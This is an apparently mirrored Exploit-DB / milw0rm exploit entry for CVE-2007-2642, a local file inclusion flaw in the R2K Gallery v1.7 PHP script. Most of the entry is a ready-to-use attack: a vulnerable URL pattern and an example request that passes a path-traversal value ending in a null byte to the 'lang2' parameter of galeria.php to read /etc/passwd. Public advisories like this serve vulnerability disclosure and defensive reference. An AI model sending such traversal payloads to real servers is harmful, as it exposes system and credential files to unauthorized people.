- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3902
- Проверка EDB
-
- Пройдено
- Автор
- DJ7XPL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2642
- Дата публикации
- 2007-05-11
Код:
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
---------------------------------------------------------------------
[!] Portal : R2K Gallery v1.7
[!] Download : http://usuarios.lycos.es/r2kscripts/
[!] Type : Local File Include Vuln
---------------------------------------------------------------------
---------------------------------------------------------------------
Bug :
http://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]
Example :
http://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00
---------------------------------------------------------------------
# milw0rm.com [2007-05-11]- Источник
- www.exploit-db.com
